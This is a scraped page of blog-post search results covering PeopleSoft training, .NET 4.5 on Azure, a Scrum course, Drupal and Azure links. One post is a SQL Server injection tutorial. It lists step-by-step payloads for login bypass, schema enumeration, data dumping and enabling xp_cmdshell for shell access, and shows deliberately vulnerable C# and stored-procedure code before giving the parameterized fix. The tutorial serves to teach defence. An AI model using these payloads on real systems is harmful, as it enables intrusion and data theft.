Search Results

Search found 13810 results on 553 pages for 'security roles'.

Page 289/553 | < Previous Page | 285 286 287 288 289 290 291 292 293 294 295 296  | Next Page >

  • PeopleSoft 9.2 Financial Management Training – Now Available

    - by Di Seghposs
    A guest post from Oracle University.... Whether you’re part of a project team implementing PeopleSoft 9.2 Financials for your company or a partner implementing for your customer, you should attend some of the new training courses.  Everyone knows project team training is critical at the start of a new implementation, including configuration training on the core application modules being implemented. Oracle offers these courses to help customers and partners understand the functionality most relevant to complete end-to-end business processes, to identify any additional development work that may be necessary to customize applications, and to ensure integration between different modules within the overall business process. Training will provide you with the skills and knowledge needed to ensure a smooth, rapid and successful implementation of your PeopleSoft applications in support of your organization’s financial management processes - including step-by-step instruction for implementing, using, and maintaining your applications. It will also help you understand the application and configuration options to make the right implementation decisions. Courses vary based on your role in the implementation and on-going use of the application, and should be a part of every implementation plan, whether it is for an upgrade or a new rollout. Here’s some of the roles that should consider training: · Configuration or functional implementers · Implementation Consultants (Oracle partners) · Super Users · Business Analysts · Financial Reporting Specialists · Administrators PeopleSoft Financial Management Courses: New Features Course: · PeopleSoft Financial Solutions Rel 9.2 New Features Functional Training: · PeopleSoft General Ledger Rel 9.2 · PeopleSoft Payables Rel 9.2 · PeopleSoft Receivables Rel 9.2 · PeopleSoft Asset Management Rel 9.2 · Expenses Rel 9.2 · PeopleSoft Project Costing Rel 9.2 · PeopleSoft Billing Rel 9.2 · PeopleSoft PS / nVision for General Ledger Rel 9.2 Accelerated Courses (include content from two courses for more experienced team members): · PeopleSoft General Ledger Foundation Accelerated Rel 9.2 · PeopleSoft Billing / Receivables Accelerated Rel 9.2 · PeopleSoft Purchasing / Payable Accelerated Rel 9.2 View PeopleSoft Training Overview Video

    Read the article

  • .NET 4.5 now supported with Windows Azure Web Sites

    - by ScottGu
    This week we finished rolling out .NET 4.5 to all of our Windows Azure Web Site clusters.  This means that you can now publish and run ASP.NET 4.5 based apps, and use  .NET 4.5 libraries and features (for example: async and the new spatial data-type support in EF), with Windows Azure Web Sites.  This enables a ton of really great capabilities - check out Scott Hanselman’s great post of videos that highlight a few of them. Visual Studio 2012 includes built-in publishing support to Windows Azure, which makes it really easy to publish and deploy .NET 4.5 based sites within Visual Studio (you can deploy both apps + databases).  With the Migrations feature of EF Code First you can also do incremental database schema updates as part of publishing (which enables a really slick automated deployment workflow). Each Windows Azure account is eligible to host 10 free web-sites using our free-tier.  If you don’t already have a Windows Azure account, you can sign-up for a free trial and start using them today. In the next few days we’ll also be releasing support for .NET 4.5 and Windows Server 2012 with Windows Azure Cloud Services (Web and Worker Roles) – together with some great new Azure SDK enhancements.  Keep an eye out on my blog for details about these soon. Hope this helps, Scott P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu

    Read the article

  • Professional Scrum Developer (.NET) Training in London

    - by Martin Hinshelwood
    On the 26th - 30th July in Microsoft’s offices in London Adam Cogan from SSW will be presenting the first Professional Scrum Developer course in the UK. I will be teaching this course along side Adam and it is a fantastic experience. You are split into teams and go head-to-head to deliver units of potentially shippable work in four two hour sprints. The Professional Scrum Developer course is the only course endorsed by both Microsoft and Ken Schwaber and they have worked together very effectively in brining this course to fruition. This course is the brain child of Richard Hundhausen, a Microsoft Regional Director, and both Adam and I attending the Trainer Prep in Sydney when he was there earlier this year. He is a fantastic trainer and no matter where you do this course you can be safe in the knowledge that he has trained and vetted all of the teachers. A tools version of Ken if you will Find a course and register Download this syllabus Download the Scrum Guide What is the Professional Scrum Developer course all about? Professional Scrum Developer course is a unique and intensive five-day experience for software developers. The course guides teams on how to turn product requirements into potentially shippable increments of software using the Scrum framework, Visual Studio 2010, and modern software engineering practices. Attendees will work in self-organizing, self-managing teams using a common instance of Team Foundation Server 2010. Who should attend this course? This course is suitable for any member of a software development team – architect, programmer, database developer, tester, etc. Entire teams are encouraged to attend and experience the course together, but individuals are welcome too. Attendees will self-organize to form cross-functional Scrum teams. These teams require an aggregate of skills specific to the selected case study. Please see the last page of this document for specific details. Product Owners, ScrumMasters, and other stakeholders are welcome too, but keep in mind that everyone who attends will be expected to commit to work and pull their weight on a Scrum team. What should you know by the end of the course? Scrum will be experienced through a combination of lecture, demonstration, discussion, and hands-on exercises. Attendees will learn how to do Scrum correctly while being coached and critiqued by the instructor, in the following topic areas: Form effective teams Explore and understand legacy “Brownfield” architecture Define quality attributes, acceptance criteria, and “done” Create automated builds How to handle software hotfixes Verify that bugs are identified and eliminated Plan releases and sprints Estimate product backlog items Create and manage a sprint backlog Hold an effective sprint review Improve your process by using retrospectives Use emergent architecture to avoid technical debt Use Test Driven Development as a design tool Setup and leverage continuous integration Use Test Impact Analysis to decrease testing times Manage SQL Server development in an Agile way Use .NET and T-SQL refactoring effectively Build, deploy, and test SQL Server databases Create and manage test plans and cases Create, run, record, and play back manual tests Setup a branching strategy and branch code Write more maintainable code Identify and eliminate people and process dysfunctions Inspect and improve your team’s software development process What does the week look like? This course is a mix of lecture, demonstration, group discussion, simulation, and hands-on software development. The bulk of the course will be spent working as a team on a case study application delivering increments of new functionality in mini-sprints. Here is the week at a glance: Monday morning and most of the day Friday will be spent with the computers powered off, so you can focus on sharpening your game of Scrum and avoiding the common pitfalls when implementing it. The Sprints Timeboxing is a critical concept in Scrum as well as in this course. We expect each team and student to understand and obey all of the timeboxes. The timebox duration will always be clearly displayed during each activity. Expect the instructor to enforce it. Each of the ½ day sprints will roughly follow this schedule: Component Description Minutes Instruction Presentation and demonstration of new and relevant tools & practices 60 Sprint planning meeting Product owner presents backlog; each team commits to delivering functionality 10 Sprint planning meeting Each team determines how to build the functionality 10 The Sprint The team self-organizes and self-manages to complete their tasks 120 Sprint Review meeting Each team will present their increment of functionality to the other teams = 30 Sprint Retrospective A group retrospective meeting will be held to inspect and adapt 10 Each team is expected to self-organize and manage their own work during the sprint. Pairing is highly encouraged. The instructor/product owner will be available if there are questions or impediments, but will be hands-off by default. You should be prepared to communicate and work with your team members in order to achieve your sprint goal. If you have development-related questions or get stuck, your partner or team should be your first level of support. Module 1: INTRODUCTION This module provides a chance for the attendees to get to know the instructors as well as each other. The Professional Scrum Developer program, as well as the day by day agenda, will be explained. Finally, the Scrum team will be selected and assembled so that the forming, storming, norming, and performing can begin. Trainer and student introductions Professional Scrum Developer program Agenda Logistics Team formation Retrospective Module 2: SCRUMDAMENTALS This module provides a level-setting understanding of the Scrum framework including the roles, timeboxes, and artifacts. The team will then experience Scrum firsthand by simulating a multi-day sprint of product development, including planning, review, and retrospective meetings. Scrum overview Scrum roles Scrum timeboxes (ceremonies) Scrum artifacts Simulation Retrospective It’s required that you read Ken Schwaber’s Scrum Guide in preparation for this module and course. MODULE 3: IMPLEMENTING SCRUM IN VISUAL STUDIO 2010 This module demonstrates how to implement Scrum in Visual Studio 2010 using a Scrum process template*. The team will learn the mapping between the Scrum concepts and how they are implemented in the tool. After connecting to the shared Team Foundation Server, the team members will then return to the simulation – this time using Visual Studio to manage their product development. Mapping Scrum to Visual Studio 2010 User Story work items Task work items Bug work items Demonstration Simulation Retrospective Module 4: THE CASE STUDY In this module the team is introduced to their problem domain for the week. A kickoff meeting by the Product Owner (the instructor) will set the stage for the why and what that will take during the upcoming sprints. The team will then define the quality attributes of the project and their definition of “done.” The legacy application code will be downloaded, built, and explored, so that any bugs can be discovered and reported. Introduction to the case study Download the source code, build, and explore the application Define the quality attributes for the project Define “done” How to file effective bugs in Visual Studio 2010 Retrospective Module 5: HOTFIX This module drops the team directly into a Brownfield (legacy) experience by forcing them to analyze the existing application’s architecture and code in order to locate and fix the Product Owner’s high-priority bug(s). The team will learn best practices around finding, testing, fixing, validating, and closing a bug. How to use Architecture Explorer to visualize and explore Create a unit test to validate the existence of a bug Find and fix the bug Validate and close the bug Retrospective Module 6: PLANNING This short module introduces the team to release and sprint planning within Visual Studio 2010. The team will define and capture their goals as well as other important planning information. Release vs. Sprint planning Release planning and the Product Backlog Product Backlog prioritization Acceptance criteria and tests Sprint planning and the Sprint Backlog Creating and linking Sprint tasks Retrospective At this point the team will have the knowledge of Scrum, Visual Studio 2010, and the case study application to begin developing increments of potentially shippable functionality that meet their definition of done. Module 7: EMERGENT ARCHITECTURE This module introduces the architectural practices and tools a team can use to develop a valid design on which to develop new functionality. The teams will learn how Scrum supports good architecture and design practices. After the discussion, the teams will be presented with the product owner’s prioritized backlog so that they may select and commit to the functionality they can deliver in this sprint. Architecture and Scrum Emergent architecture Principles, patterns, and practices Visual Studio 2010 modeling tools UML and layer diagrams SPRINT 1 Retrospective Module 8: TEST DRIVEN DEVELOPMENT This module introduces Test Driven Development as a design tool and how to implement it using Visual Studio 2010. To maximize productivity and quality, a Scrum team should setup Continuous Integration to regularly build every team member’s code changes and run regression tests. Refactoring will also be defined and demonstrated in combination with Visual Studio’s Test Impact Analysis to efficiently re-run just those tests which were impacted by refactoring. Continuous integration Team Foundation Build Test Driven Development (TDD) Refactoring Test Impact Analysis SPRINT 2 Retrospective Module 9: AGILE DATABASE DEVELOPMENT This module lets the SQL Server database developers in on a little secret – they can be agile too. By using the database projects in Visual Studio 2010, the database developers can join the rest of the team. The students will see how to apply Agile database techniques within Visual Studio to support the SQL Server 2005/2008/2008R2 development lifecycle. Agile database development Visual Studio database projects Importing schema and scripts Building and deploying Generating data Unit testing SPRINT 3 Retrospective Module 10: SHIP IT Teams need to know that just because they like the functionality doesn’t mean the Product Owner will. This module revisits acceptance criteria as it pertains to acceptance testing. By refining acceptance criteria into manual test steps, team members can execute the tests, recording the results and reporting bugs in a number of ways. Manual tests will be defined and executed using the Microsoft Test Manager tool. As the Sprint completes and an increment of functionality is delivered, the team will also learn why and when they should create a branch of the codeline. Acceptance criteria Testing in Visual Studio 2010 Microsoft Test Manager Writing and running manual tests Branching SPRINT 4 Retrospective Module 11: OVERCOMING DYSFUNCTION This module introduces the many types of people, process, and tool dysfunctions that teams face in the real world. Many dysfunctions and scenarios will be identified, along with ideas and discussion for how a team might mitigate them. This module will enable you and your team to move toward independence and improve your game of Scrum when you depart class. Scrum-butts and flaccid Scrum Best practices working as a team Team challenges ScrumMaster challenges Product Owner challenges Stakeholder challenges Course Retrospective What will be expected of you and you team? This is a unique course in that it’s technically-focused, team-based, and employs timeboxes. It demands that the members of the teams self-organize and self-manage their own work to collaboratively develop increments of software. All attendees must commit to: Pay attention to all lectures and demonstrations Participate in team and group discussions Work collaboratively with other team members Obey the timebox for each activity Commit to work and do your best to deliver All teams should have these skills: Understanding of Scrum Familiarity with Visual Studio 201 C#, .NET 4.0 & ASP.NET 4.0 experience*  SQL Server 2008 development experience Software testing experience * Check with the instructor ahead of time for the exact technologies Self-organising teams Another unique attribute of this course is that it’s a technical training class being delivered to teams of developers, not pairs, and not individuals. Ideally, your actual software development team will attend the training to ensure that all necessary skills are covered. However, if you wish to attend an open enrolment course alone or with just a couple of colleagues, realize that you may be placed on a team with other attendees. The instructor will do his or her best to ensure that each team is cross-functional to tackle the case study, but there are no guarantees. You may be required to try a new role, learn a new skill, or pair with somebody unfamiliar to you. This is just good Scrum! Who should NOT take this course? Because of the nature of this course, as explained above, certain types of people should probably not attend this course: Students requiring command and control style instruction – there are no prescriptive/step-by-step (think traditional Microsoft Learning) labs in this course Students who are unwilling to work within a timebox Students who are unwilling to work collaboratively on a team Students who don’t have any skill in any of the software development disciplines Students who are unable to commit fully to their team – not only will this diminish the student’s learning experience, but it will also impact their team’s learning experience Find a course and register Download this syllabus Download the Scrum Guide Technorati Tags: Scrum,SSW,Pro Scrum Dev

    Read the article

  • Drupal CMS most Stable for High Traffic

    - by Aditi
    Drupal users have high satisfaction with Drupal compared to the Joomla users, for a number of reasons. If you are thinking of  choosing a high performance platform to run your high traffic website.. Drupal Installation is your forte! Overload Scenario Drupal is scalable high performance CMS and is stable under heavy load. If your server is pushed beyond its capacity, Drupal shuts off gracefully and doesn’t crash. As soon as the server is back within its traffic capability, Drupal handles all requests smoothly again. For example if your dedicated server can handle a maximum of 50,000 visits a day, and on lucky days when your news created the buzz in social media and your traffic rose to 70,000 on one day, then your server will be overloaded and usually it crashes causing permanent damage to your database at times.. But if you have used Drupal CMS it closes down gracefully an as soon as traffic goes down to within the server’s capacity, the Drupal running site accepts all requests again. Extensibility Drupal users know that their add-ons integrate better with the core, and their framework makes it easier to extend their CMS’s capabilities.. which makes an extended version of it quite stable unlike Joomla, which loses its strength if you have plenty of plugins & heavy customizations running. Any CMS with number of plugins makes the content complex and reduces your ability to handle high traffic requests. Accessibility Management or ACL Chances are if you are high traffic website, you may have various users & content contributors. ACL means group roles that is assigning people out of the various registered user levels and allocating many kinds of privileges. The most common example is the ability to see or edit a section or selected pages. This efficient feature of Drupal makes it a class apart than other CMSs out there.

    Read the article

  • Oracle’s AutoVue Enables Visual Decision Making

    - by Pam Petropoulos
    That old saying about a picture being worth a thousand words has never been truer.  Check out the latest reports from IDC Manufacturing Insights which highlight the importance of incorporating visual information in all facets of decision making and the role that Oracle’s AutoVue Enterprise Visualization solutions can play. Take a look at the excerpts below and be sure to click on the titles to read the full reports. Technology Spotlight: Optimizing the Product Life Cycle Through Visual Decision Making, August 2012 Manufacturers find it increasingly challenging to make effective product-related decisions as the result of expanded technical complexities, elongated supply chains, and a shortage of experienced workers. These factors challenge the traditional methodologies companies use to make critical decisions. However, companies can improve decision making by the use of visual decision making, which synthesizes information from multiple sources into highly usable visual context and integrates it with existing enterprise applications such as PLM and ERP systems. Product-related information presented in a visual form and shared across communities of practice with diverse roles, backgrounds, and job skills helps level the playing field for collaboration across business functions, technologies, and enterprises. Visual decision making can contribute to manufacturers making more effective product-related decisions throughout the complete product life cycle. This Technology Spotlight examines these trends and the role that Oracle's AutoVue and its Augmented Business Visualization (ABV) solution play in this strategic market. Analyst Connection: Using Visual Decision Making to Optimize Manufacturing Design and Development, September 2012 In today's environments, global manufacturers are managing a broad range of information. Data is often scattered across countless files throughout the product life cycle, generated by different applications and platforms. Organizations are struggling to utilize these multidisciplinary sources in an optimal way. Visual decision making is a strategy and technology that can address this challenge by integrating and widening access to digital information assets. Integrating with PLM and ERP tools across engineering, manufacturing, sales, and marketing, visual decision making makes digital content more accessible to employees and partners in the supply chain. The use of visual decision-making information rendered in the appropriate business context and shared across functional teams contributes to more effective product-related decision making and positively impacts business performance.

    Read the article

  • SyncToBlog #10 Lots of Azure and Cloud Links including MIX10 videos

    - by Eric Nelson
    Just getting a few interesting cloud links “down on paper”. I last did one of these on Azure in Feb 20010. Cloud Links: Article on Debugging in the Cloud http://code.msdn.microsoft.com/azurescale  A sample app that demonstrates monitoring and automatically scaling an Azure application in response to dropping performance etc. Basically a console app that checks perf stats and then uses the Service Management API to spin up new instances when needed. Azure In Action book is imminent :) Running Memcached in Windows Azure from the MS UK team Using Microsoft Codename Dallas as a data source for Drupal also from the MS UK team I often mention them – but this post is the biz! Metodi on fault and upgrade domains Detailed blog post on comparing Azure AppFabric Service Bus REST support to the free Faye Ruby+JavaScript gem that implements the JSON publish/subscribe protocol Bayeux. AppFabric LABS allow you to test out and play with experimental AppFabric technologies. Details of the upcoming VM support in Windows Azure Nice series of posts from J D Meier in the Patterns and Practice team How To Use ASP.NET Forms Auth with Azure Tables  How To Use ASP.NET Forms Auth with Roles in Azure Tables How To Use ASP.NET Forms Auth with SQL Server on Windows Azure And sessions from MIX10 held March 15th to 17th: Lap around the Windows Azure Platform – Steve Marx Building and Deploying Windows Azure Based Applications with Microsoft Visual Studio 2010 – Jim Nakashima Building PHP Applications using the Windows Azure Platform – Craig Kitterman, Sumit Chawla Using Ruby on Rails to Build Windows Azure Applications – Sriram Krishnan Microsoft Project Code Name “Dallas": Data for your apps – Moe Khosravy Using Storage in the Windows Azure Platform – Chris Auld Building Web Applications with Windows Azure Storage – Brad Calder Building Web Application with Microsoft SQL Azure – David Robinson Connecting Your Applications in the Cloud with Windows Azure AppFabric – Clemens Vasters Microsoft Silverlight and Windows Azure: A Match Made for the Web – Matt Kerner Something for everyone :)

    Read the article

  • What is your definition of a programmer?

    - by Amir Rezaei
    The definition of a programmer is not obvious. It has happened that I have asked questions in this forum where people believe it don’t belong here because it’s not programmer related. I thought this question may clarify the definition. What characteristics, roles and activities do you think defines a programmer? Is there a typical programmer? The technology changes so fast that it may be hard to be typical programmer. From wikipedia: A programmer, computer programmer or coder is someone who writes computer software. The term computer programmer can refer to a specialist in one area of computer programming or to a generalist who writes code for many kinds of software. One who practices or professes a formal approach to programming may also be known as a programmer analyst. A programmer's primary computer language (C, C++, Java, Lisp, Delphi etc.) is often prefixed to the above titles, and those who work in a web environment often prefix their titles with web. The term programmer can be used to refer to a software developer, software engineer, computer scientist, or software analyst. However, members of these professions typically possess other software engineering skills, beyond programming; for this reason, the term programmer is sometimes considered an insulting or derogatory oversimplification of these other professions. This has sparked much debate amongst developers, analysts, computer scientists, programmers, and outsiders who continue to be puzzled at the subtle differences in these occupations

    Read the article

  • TFS 2010 Server Name Change

    - by PearlFactory
    So I thought I would  change the name of my machine so that the other devs can find the TFS server easily. TFS 2005 would use the cool cmd line util tfsadminutil.....alas he is now gone HERE Are the steps to complete Edit the web.config and is usually located on default install C:\Program Files\Microsoft Team Foundation Server 2010\Application Tier\Web Services\web.config <add key="applicationDatabase" value="Data Source=JUSTIN\SQLI01;Initial Catalog=Tfs_Configuration;Integrated Security=True;" /> Next step is to edit previous Solutions/Projects 1) Open the Solution file i.e ProductApp.sln 2) Edit the SccTeamFoundationServer URL under Global section i.e Change this to new name   If you have DB server on same machine ...you will need to go in and remove existing db user account assigned to the tfs DB Remove old [%machine_name%] value i.e Tuned_Dev_PC_12\Justin user from the above DBs No add the new Justin\Justin user account associated with the new machine name to the TFS & Reporing dbs ... dbo or the TFSADMIN & TFSEXEC roles either will do in this case. (or add both ) Now either ReApply user or add New account (remove old account i.e Tuned_Dev_PC_12\justin) If DB permisions are setup correctyly you will get a screen that looks like this   If it pauses or gets stuck you need to look back at the adding correct DB Perms to the i.e JUSTIN\Justin user account Also if your project is still complaining about old TFS name 1) Team\Connect new Team Foundation Server 2) Add\Remove TFS 3) Add New TFS Name  Once you have connected to the new TFS server Reload your project from TFS..this way it removes a lot of the bugs that hang around in the local project\solution This is similar to a VSS2005 and older fix Cheers ( eta about 60-90 mins so weigh up the the need vs payoff. ) Shutdown restart

    Read the article

  • .NET 4.5 agora é suportado nos Web Sites da Windows Azure

    - by Leniel Macaferi
    Nesta semana terminamos de instalar o .NET 4.5 em todos os nossos clusters que hospedam os Web Sistes da Windows Azure. Isso significa que agora você pode publicar e executar aplicações baseadas na ASP.NET 4.5, e usar as bibliotecas e recursos do .NET 4.5 (por exemplo: async e o novo suporte para dados espaciais (spatial data type no Entity Framework), com os Web Sites da Windows Azure. Isso permite uma infinidade de ótimos recursos - confira o post de Scott Hanselman com vídeos (em Inglês) que destacam alguns destes recursos. O Visual Studio 2012 inclui suporte nativo para publicar uma aplicação na Windows Azure, o que torna muito fácil publicar e implantar sites baseados no .NET 4.5 a partir do Visual Studio (você pode publicar aplicações + bancos de dados). Com o recurso de Migrações da abordagem Entity Framework Code First você também pode fazer atualizações incrementais do esquema do banco de dados, como parte do processo de publicação (o que permite um fluxo de trabalho de publicação extremamente automatizado). Cada conta da Windows Azure é elegível para hospedar até 10 web-sites gratuitamente, usando nossa camada Escalonável "Compartilhada". Se você ainda não tem uma conta da Windows Azure, você pode inscrever-se em um teste gratuito para começar a usar estes recursos hoje mesmo. Nos próximos dias, vamos também lançar o suporte para .NET 4.5 e Windows Server 2012 para os Serviços da Nuvem da Windows Azure (Web e Worker Roles) - juntamente com algumas novas e ótimas melhorias para o SDK da Windows Azure. Fique de olho no meu blog para mais informações sobre estes lançamentos em breve. Espero que ajude, - Scott PS Além do blog, eu também estou agora utilizando o Twitter para atualizações rápidas e para compartilhar links. Siga-me em: twitter.com/ScottGu Texto traduzido do post original por Leniel Macaferi.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • What is spreadsheet useful for?

    - by zvrba
